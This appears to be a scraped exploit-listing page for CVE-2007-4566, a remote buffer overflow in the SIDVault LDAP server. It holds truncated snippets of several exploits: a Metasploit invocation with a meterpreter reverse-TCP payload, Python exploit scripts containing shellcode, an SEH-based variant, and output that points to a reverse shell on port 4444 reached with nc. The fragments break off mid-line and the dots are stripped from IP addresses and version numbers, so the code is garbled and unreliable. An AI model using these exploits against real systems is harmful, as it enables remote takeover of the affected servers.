CVE-2007-4566

#--attack-log-- #attacker@dz-labs:~/pentests/metasploit/framework-32/trunk$ /msfcli exploit/windows/ldap/sidvault_ldap #PAYLOAD=windows/meterpreter/reverse_tcp LHOST=19216812 RHOST=19216813 E #[*] Please wait while we load the module tree #[*] Handler binding to LHOST 0000 #[*] Started reverse handler #[*] Sending stage (718336 bytes) ...

#!/usr/bin/python # # $ /sidvaultpy 1921681131 # # [*] SIDVault 20e Windows Remote Buffer Overflow # [*] Written by blake # [*] Tested on Windows XP SP3 # [+] Sending payload # [+] Check port 4444 for shell # # $ nc 1921681131 4444 # Microsoft Windows XP [Version 512600] # (C) Copyright 1985-2001 Microsoft Corp # # C:\WINDOWS\system32&g ...

#!/usr/bin/python """ Alpha Centauri Software SIDVault LDAP Server remote root exploit (0days) """ import sys import socket sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" sc += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" sc += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" sc + ...

#!/usr/bin/python import socket, sys, ldap print "[*] SidVault 20e Windows Universal Buffer Overflow Exploit (SEH)" print "[*] Original author : blake" print "[*] Seh Exploit : Skull-Hacker" print "[*] Tested on Windows XP SP3" if len(sysargv)!=2: print "[*] Usage: %s <ip>" % sysargv[0] sysexit(0) # win32_exec - EXITFUNC=seh CMD=c ...